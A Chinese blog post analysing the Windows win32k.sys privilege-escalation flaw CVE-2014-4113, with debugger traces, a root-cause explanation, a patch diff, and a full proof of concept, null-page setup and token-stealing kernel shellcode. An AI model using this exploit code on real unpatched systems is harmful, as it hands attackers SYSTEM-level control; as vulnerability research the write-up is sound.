漏洞分析:MS14-058(CVE-2014-4113)

最新推荐文章于 2023-10-05 17:44:55 发布
最新推荐文章于 2023-10-05 17:44:55 发布
阅读量576 收藏
点赞数 1
分类专栏: 漏洞 游戏安全 网络安全 文章标签: microsoft
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64973256/article/details/127431253
版权
网络安全 同时被 3 个专栏收录
79 篇文章 4 订阅
订阅专栏
漏洞
53 篇文章 2 订阅
订阅专栏
游戏安全
24 篇文章 2 订阅
订阅专栏

作者:selph

漏洞分析:CVE-2014-4113

漏洞介绍
漏洞程序
Microsoft Windows是美国微软(Microsoft)公司发布的一系列操作系统。win32k.sys是Windows子系统的内核部分,是一个内核模式设备驱动程序,它包含有窗口管理器、后台控制窗口和屏幕输出管理等。

如果Windows内核模式驱动程序不正确地处理内存中的对象,则存在一个特权提升漏洞。成功利用此漏洞的攻击者可以运行内核模式中的任意代码。攻击者随后可安装程序;查看、更改或删除数据;或者创建拥有完全管理权限的新帐户。

漏洞原理
该漏洞发生的位置是在驱动文件Win32k.sys中的xxxHandleMenuMessage函数中,销毁弹出菜单的时候通过钩子的方法修改返回值,将返回值修改为fffffffb,因为对这个值没有严格的检查从而在sendmessage中再次被引用到,从而造成了UAF,这个方法可以在sendmessage中跳转到shellcode从而提权

实验环境
虚拟机:Windows 7 x86 sp1

物理机:Windows 10 x64 21H2

用到的工具:IDA,Windbg,VS2022

漏洞分析
以网上随便找的poc为突破口,开始分析漏洞,在虚拟机里运行poc,windbg接管异常,说明漏洞实际存在(默认安装的Windows7x86sp1)

查看调用堆栈:

kd> kb

ChildEBP RetAddr Args to Child

00 af0bfa64 9d5b95c5 fffffffb 000001ed 0024fcd4 win32k!xxxSendMessageTimeout+0xb3
01 af0bfa8c 9d6392fb fffffffb 000001ed 0024fcd4 win32k!xxxSendMessage+0x28
02 af0bfaec 9d638c1f af0bfb0c 00000000 0024fcd4 win32k!xxxHandleMenuMessages+0x582
03 af0bfb38 9d63f8f1 fd665208 9d71f580 00000000 win32k!xxxMNLoop+0x2c6
04 af0bfba0 9d63f9dc 0000001c 00000002 00000000 win32k!xxxTrackPopupMenuEx+0x5cd
05 af0bfc14 83e441ea 00010211 00000002 00000000 win32k!NtUserTrackPopupMenuEx+0xc3

06 af0bfc14 77a670b4 (T) 00010211 00000002 00000000 nt!KiFastCallEntry+0x12a

07 0024fce8 762a483e (T) 76292243 00010211 00000002 ntdll!KiFastSystemCallRet

查看一下当前异常的地方:

kd> u
win32k!xxxSendMessageTimeout+0xb3:
9d5b93fa 3b7e08 cmp edi,dword ptr [esi+8]
9d5b93fd 0f8484000000 je win32k!xxxSendMessageTimeout+0x140 (9d5b9487)
9d5b9403 8b0e mov ecx,dword ptr [esi]
9d5b9405 8b15e4d1719d mov edx,dword ptr [win32k!gSharedInfo+0x4 (9d71d1e4)]
9d5b940b 81e1ffff0000 and ecx,0FFFFh
9d5b9411 0faf0de8d1719d imul ecx,dword ptr [win32k!gSharedInfo+0x8 (9d71d1e8)]
9d5b9418 33c0 xor eax,eax
9d5b941a f644110901 test byte ptr [ecx+edx+9],1

是esi的值导致了漏洞,查看esi的值:

kd> r esi
esi=fffffffb

在调用链中,由用户层的TrackPopupMenu函数触发漏洞,而这个函数的功能是在屏幕指定位置显示快捷菜单并且跟踪选择的菜单项(参考资料[6])

这里头会调用xxxMNLoop,这个函数里有while(1)循环,应该是消息循环,处理消息的函数貌似正是xxxHandleMenuMessages

据查阅资料(参考资料[11]),TrackPopupMenu显示菜单之后,消息循环就由菜单接管了,此时进入的是PopupMenu的消息循环

分析xxxHandleMenuMessages
这里面开始经过一堆判断之后,会通过xxxMNFindWindowFromPoint获取一个窗口句柄,用于后续的xxxSendMessage函数使用

这个分支的大概内容是,从鼠标位置获取下一层的菜单项,获取到了就发送ButtonDown(0x1ED)消息,也就是说,执行到这个分支实际上是点击事件!

而这里对于xxxMNFindWindowFromPoint返回的句柄值的处理则是,如果不是-1,就发送0x1ED消息

 

分析xxxMNFindWindowFromPoint
异常发生在了xxxSendMessage里的,是由于第一个参数传入的有问题导致的,而第一个参数来自xxxMNFindWindowFromPoint的返回值,该函数如下图所示

可以看到这个函数的开头:这里首先判断了当前菜单是否存在下级菜单,条件是ppopupmenu->spwndNextPopup有值,这里的ppopupmenu是传入的参数,是PPOPUPMENU结构体(参考资料[14])

其中spwndNextPopup成员的值含义是:下一层Popup菜单,是WND结构,所以需要创建两个popup菜单,其中一个作为另一个的下层

struct tagWND spwndNextPopup;
/ The next popup in the hierarchy. Null if the last
* in chain
*/

这里发送了消息0x1EB,MN_FINDMENUWINDOWFROMPOINT消息,根据名字猜测功能就是根据位置找菜单窗口,发送的目标是popup菜单的下一层菜单,返回值应该就是菜单句柄了

 

这里对返回值会调用IsMFMWFPWindow函数进行处理:如果是非空,且不为-5或-1,就返回1

BOOL __stdcall IsMFMWFPWindow(int a1)
{
return a1 && a1 != -5 && a1 != -1;
}

若这里返回了1,就会进入if语句导致该变量被重新赋值,也就是说,这里如果要跳过这个if语句,返回值就必须是-1或-5,而在前面看到,如果返回值是-1,则不会进入到触发漏洞的SendMessage中,所以这里的返回值在为-5的时候,会触发漏洞

分析xxxSendMessage
int __stdcall xxxSendMessage(PVOID P, CHAR pszMultiByteString, WCHAR WideCharString, void *Src)
{
InterlockedIncrement(&glSendMessage);
return xxxSendMessageTimeout(P, pszMultiByteString, WideCharString, Src, 0, 0, 0, (PVOID)1);
}

这个函数把传入的参数又接着传入了xxxSendMessageTimeout函数

分析xxxSendMessageTimeout
程序异常点在esi的值上,esi=-5被传入了进来,然后进行取值触发地址访问异常

这个函数首先把这个值保存到了esi

 

接着往下有一个比较跳转:会从esi+8的地址取值

 

再往下还有两个要esi的地方:

 

Poc编写
如果能控制0x1EB消息的返回值为-5,那么就能走到xxxSendMessageTimeout中,让程序异常触发漏洞,实现poc

参考师傅们的笔记(参考资料[15])得知,这里的调用SendMessage存在两种调用形式,同步和异步,在异步调用的情况下,会从内核态进入用户态去执行用户钩子,执行完再切换回内核态返回:因此,可以Hook 0x1EB消息

Poc如下(参考自参考资料[5]的poc代码):

#include
#include

LRESULT CALLBACK DialogFun(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
// 手动触发按下事件
if (uMsg == WM_ENTERIDLE) {
PostMessageA(hWnd, WM_KEYDOWN, VK_DOWN, 0);
PostMessageA(hWnd, WM_KEYDOWN, VK_RIGHT, 0);
PostMessageA(hWnd, WM_LBUTTONDOWN, 0, 0);
}
return DefWindowProc(hWnd, uMsg, wParam, lParam);
}

LRESULT CALLBACK NewDialogFun(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
// 触发漏洞,返回-5
if (uMsg == 0x1eb) {
return -5;
}

return DefWindowProc(hWnd, uMsg, wParam, lParam);

}

LRESULT CALLBACK HookCallback(int code, WPARAM wParam, LPARAM lParam)
{
CWPSTRUCT* ptag = (CWPSTRUCT*)lParam;
if (ptag->message == 0x1eb)
{
// 这里至关重要:需要解除Hook
if (UnhookWindowsHook(WH_CALLWNDPROC, HookCallback)) {
SetWindowLongA(ptag->hwnd, GWLP_WNDPROC, (LONG)NewDialogFun);
}
}
return CallNextHookEx(0, code, wParam, lParam);
}

int main()
{
// 注册窗口类
WNDCLASSA wnd = { 0 };
wnd.hInstance = ::GetModuleHandle(NULL);
wnd.lpfnWndProc = DialogFun;
wnd.lpszClassName = “CVE-2014-4113”;
RegisterClassA(&wnd);

// 创建窗口
HWND hwnd = ::CreateWindowA(
    wnd.lpszClassName, "CVE-2014-4113", WS_OVERLAPPEDWINDOW, 0, 0, 800, 600, NULL, NULL, wnd.hInstance, NULL);

// 创建Pop-up菜单
// 需要两个菜单,一个作为子菜单存在
HMENU menu1 = CreatePopupMenu();    // 主菜单
HMENU menu2 = CreatePopupMenu();    // 子菜单
::AppendMenuA(menu2, MF_STRING, 0, "world");
::AppendMenuA(menu1, MF_STRING | MF_POPUP, (UINT_PTR)menu2, "hello");  //给它一个 spwndNextPopup 指针

// 设置Hook
::SetWindowsHookExA(WH_CALLWNDPROC, HookCallback, NULL, GetCurrentThreadId());

// 触发漏洞
BOOL ret = TrackPopupMenu(menu1, TPM_RIGHTBUTTON, 0, 0, 0, hwnd, 0);

return 0;

}

这里踩了个坑!!设置完钩子在里头记得要解除钩子!!!

漏洞利用
在Poc的基础上,如果能控制0x3,0x11,0x5B这几个地址的值,就能进行漏洞的利用

布置内存
DWORD GetPtiCurrent() {
__asm
{
mov eax, fs: [0x18]
mov eax, [eax + 0x40]
}
}

BOOL initMem() {
// 初始化一些要用到的内存
HMODULE hNtdll = GetModuleHandleA(“ntdll.dll”);
typedef NTSTATUS(WINAPI* PNtAllocateVirtualMemory)(
HANDLE ProcessHandle,
PVOID* BaseAddress,
ULONG ZeroBits,
PULONG AllocationSize,
ULONG AllocationType,
ULONG Protect
);
PNtAllocateVirtualMemory NtAllocateVirtualMemory = (PNtAllocateVirtualMemory)GetProcAddress(hNtdll, “NtAllocateVirtualMemory”);

// 申请内存
ULONG base = -5;
ULONG size = 0x1000;
NTSTATUS ntstatus = NtAllocateVirtualMemory(GetModuleHandle(NULL), (PVOID*)&base, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (ntstatus != 0) {
    FreeLibrary(hNtdll);
    return FALSE;
}
*(DWORD*)0x3 = GetPtiCurrent();
*(BYTE*)0x11 = (BYTE)4;
*(DWORD*)0x5B = (DWORD)ShellCode;
return TRUE;

}

Shellcode
来自参考资料[19]

int __stdcall ShellCode(int parameter1, int parameter2, int parameter3, int parameter4)
{
_asm
{
pushad
mov eax, fs: [124h] // Find the _KTHREAD structure for the current thread
mov eax, [eax + 0x50] // Find the _EPROCESS structure
mov ecx, eax
mov edx, 4 // edx = system PID(4)

    // The loop is to get the _EPROCESS of the system
    find_sys_pid :
    mov eax, [eax + 0xb8]   // Find the process activity list
    sub eax, 0xb8           // List traversal
    cmp[eax + 0xb4], edx    // Determine whether it is SYSTEM based on PID
    jnz find_sys_pid

    // Replace the Token
    mov edx, [eax + 0xf8]
    mov[ecx + 0xf8], edx
    popad
}
return 0;

}

完整代码见GitHub:https://github.com/kn0sky/vul-analysis-study/blob/main/CVE-2014-4113/CVE-2014-4113.cpp

利用截图

 

补丁diff
漏洞触发点(0x1ED消息)处的函数对比

 

可以看到,左边检查ebx参数是检查是否是-1,不是-1则发送消息

右边的检查则多了一个过程,调用了IsMFMWFPWindow函数进行再次检查:

BOOL __stdcall IsMFMWFPWindow(int a1)
{
return a1 && a1 != -5 && a1 != -1;
}

这下子直接杜绝了把-5当作参数传入SendMessage函数的情况,从而修补了漏洞

参考资料
• [1] CVE - CVE-2014-4113 (mitre.org)
• [2] 国家信息安全漏洞库 (cnnvd.org.cn)
• [3] Download Windows 7 安全更新程序 (KB3000061) from Official Microsoft Download Center
• [4] CVE-2014-4113提权漏洞学习笔记 - 知乎 (zhihu.com)
• [5] cveXXXX/poc.cpp at master · B2AHEX/cveXXXX · GitHub
• [6] TrackPopupMenuEx function (winuser.h) - Win32 apps | Microsoft Docs
• [7] CreatePopupMenu function (winuser.h) - Win32 apps | Microsoft Docs
• [8] AppendMenuA function (winuser.h) - Win32 apps | Microsoft Docs
• [9] CallWndProc callback function (Windows) | Microsoft Docs
• [10] SetWindowLongPtrA function (winuser.h) - Win32 apps | Microsoft Docs
• [11] TrackPopupMenu弹出菜单后父窗口的消息响应问题-CSDN社区
• [12] Win32k: mnloop.c 文件参考 (gitee.io)
• [13] Win32k: menu.c 源文件 (gitee.io)
• [14] Win32k: tagPOPUPMENU结构体 参考 (gitee.io)
• [15] 【技术分享】经典内核漏洞调试笔记 - 安全客,安全资讯平台 (anquanke.com)
• [16] [原创]CVE-2014-4113分析及Exploit逆向-二进制漏洞-看雪论坛-安全社区|安全招聘|bbs.pediy.com
• [17] [原创]CVE-2014-4113提权漏洞学习笔记-二进制漏洞-看雪论坛-安全社区|安全招聘|bbs.pediy.com
• [18] CVE-2014-4113 Windows内核经典Use Afer Free漏洞分析 | Thunder_J (thunderjie.github.io)
• [19] CVE/CVE-2014-4113.c at master · ThunderJie/CVE · GitHub
• [20] CVE-2014-4113_Thunder_J的博客-CSDN博客

极安御信安全研究院
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
MS14-058提权神器
09-24
MS14-058 提权 windows提权
漏洞分析丨cve20144113
m0_64973256的博客
04-21 403
Microsoft Windows下的 win32k.sys是Windows子系统的内核部分,是一个内核模式设备驱动程序,它包含有窗口管理器、后者控制窗口显示和管理屏幕输出等。如果Windows内核模式驱动程序不正确地处理内存中的对象,则存在一个特权提升漏洞。成功利用此漏洞的攻击者可以运行内核模式中的任意代码。攻击者随后可安装程序;查看、更改或删除数据;或者创建拥有完全管理权限的新帐户。
注册表检测 ms14-058 CVE-2014-4113
weixin_33836223的博客
12-24 117
#检测ms14-058CVE-2014-4113HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\HotFix\KB3000061\Installed 转载于:https://www.cnblogs.com/dzxs/p/4183642.html
MS14-058 CVE-2014-4113
10-21
MS14-058 CVE-2014-4113
EPATHOBJ 提权源码
yy405145590的专栏
06-05 1809
#include #include #include #include //#include #pragma comment(lib, "gdi32") #pragma comment(lib, "kernel32") #pragma comment(lib, "user32") #define MAX_POLYPOINTS (8192 * 3) #define MAX_REGION
IIS "IP and domain restrictions" 绕过漏洞(CVE-2014-4078)
02-09
【该漏洞通过版本比较方式检测,结果可能不准确,需要根据实际情况确认。】Microsoft Internet信息服务(IIS)是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。 "IP and domain restrictions" ...
MS10-070ASP.NETPaddingOracle信息泄露漏洞
03-02
我记得这个漏洞在12年的时候,国内的资料还很少,当时遇到之后来回找资料,但是国内当时在网上能看到的资料只有2篇,但我忘记是哪2篇了,不过手上是有2篇比较早的资料,先传上来做个引题吧。然后,在13年,这个漏洞...
MS14-058-x64.exe
07-23
MS14-058漏洞(CVE-2014-4113)_ms14058提权
MS14-058 最新提权神器
weixin_33964094的博客
11-04 739
MS14-058 CVE-2014-4113 最新提权神器Win64bit提权0day漏洞CVE-2014-4113)所有Windows版本受影响该安全漏洞影响了所有的Windows版本,包括Windows7 和 Windows Server 2008 R2 及以下版本。在Windows 8和英特尔的Ivy Bridge或者新一代处理器的系统中,SMEP(Superviso...
[LPE]Windows Local Privilege Escalation MS14-058
BraveWinds B10G
02-24 844
MS14-058GithubINFO| CVE-2014-4113 | Report 20141014 | Patch KB3000061 |Windows Kernel-mode Driver/ Win32k.sysEffectWindows XP SP3Windows 7/8/8.1Windows Server 2003/2008/2012TestingSource Code by ? - S
HEVD-Python-Solutions:用于HackSysTeam Extreme漏洞驱动程序的Python解决方案
05-04
HEVD-Python-解决方案 用于HackSysTeam Extreme漏洞驱动程序的Python解决方案
CVE-2014-4113的POC
04-18
这是windows内核提权漏洞的一个POC,用来帮助分析理解漏洞原理。
NVIDIA显卡驱动曝出多安全漏洞,部分Windows和Linux设备受到影响
systemino的博客
06-30 630
上周,科技巨头Nvidia发布了Nvidia GPU Display Driver中的多个安全漏洞的安全更新。这10个安全漏洞的CVSS 评分在5.5到7.8之间,影响的设备包括Windows和Linux机器。 漏洞分析 其中影响NVIDIA GPU显卡驱动的安全漏洞分别是: CVE‑2020‑5962 CVE‑2020‑5962漏洞位于驱动的Nvidia Control Panel组件中,奇热本地攻击者利用该漏洞可以破坏系统文件,引发DoS攻击或权限提升。 CVE‑2020‑5963 CVE‑
MS14-058漏洞分析(CVE-2014-4113)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-31 496
MS14-058漏洞程序,Microsoft Windows是美国微软(Microsoft)公司发布的一系列操作系统。win32k.sys是Windows子系统的内核部分,是一个内核模式设备驱动程序,它包含有窗口管理器、后台控制窗口和屏幕输出管理等。 如果Windows内核模式驱动程序不正确地处理内存中的对象,则存在一个特权提升漏洞。成功利用此漏洞的攻击者可以运行内核模式中的任意代码。攻击者随后可安装程序;查看、更改或删除数据;或者创建拥有完全管理权限的新帐户。 MS14-058漏洞原理 该漏洞发生的位置是
CVE-2014-4113 (MS14-058)提权
qq_42307546的博客
03-25 1252
2.CVE-2014-4113 (MS14-058)提权 1.漏洞描述 Microsoft Windows下的 win32k.sys是Windows子系统的内核部分,是一个内核模式设备驱动程序,它 包含有窗口管理器、后者控制窗口显示和管理屏幕输出等。如果Windows内核模式驱动程序不正确地处 理内存中的对象,则存在一个特权提升漏洞。成功利用此漏洞的攻击者可以运行内核模式中的任意代 码。攻击者随后可安装程序;查看、更改或删除数据;或者创建拥有完全管理权限的新帐户。 2.影响版本 该漏洞影响所有Windows
cpu-z 驱动漏洞利用
r250414958的博客
03-26 763
cpu-z 驱动漏洞利用前言OBOperationRegistration参考项目 前言 其实这种利用大多数是用来做一些外挂的利用,但是我们可以转换思路来用来对抗杀毒软件的保护。 不只是cup-z有这种漏洞,技嘉,戴尔,华硕…等一些大厂都有这种漏洞,并且有些驱动签名还没有失效。 OBOperationRegistration 当某些软件使用openprocess打开了杀毒软件的进程的时候,会触发这个回调,对openprocess的句柄进行降权操作.使得我们无法使用TerminateProcess、Wri
漏洞利用ms(17-010)
qq_55011640的博客
03-30 2800
利用namap --script=vuln +ip 发现靶机存在ms17-010漏洞 MS17-010漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时,在大非分页池(Large Non-Paged Kernel Pool)上存在缓冲区溢出。 函数srv!SrvOs2FeaListToNt在将FEA list转换成NTFEA(Windows NT FEA) list前会调用。srv!SrvOs
MS12-020漏洞(远程桌面漏洞)(渗透笔记)
最新发布
weixin_43899811的博客
10-05 1234
小白渗透测试笔记,ms12-020漏洞
MS-一些常见远程漏洞利用
weixin_33928137的博客
04-06 1188
一些漏洞工具的使用,对于漏洞的详细解析,我倒是没有这个能力。 MS07-029-Dns 溢出 早期的win2003 2000 dns服务器的漏洞 MS07-029,Windows 域名系统 (DNS) 服务器服务的远程过程调用 (RPC) 管理接口中存在基于堆栈的缓冲区溢出 #借用黑白网络的图 到这里 一些漏洞利用格式会一些不同 ...
ms14-068漏洞原理
06-01
MS14-068是指微软在2014年11月发布的一个安全公告,其中描述了一种影响Active Directory(AD)的漏洞。这个漏洞的编号是CVE-2014-6324。 该漏洞的利用方式是通过篡改Kerberos协议中的“域控制器”字段来进行攻击。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

极安御信安全研究院

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值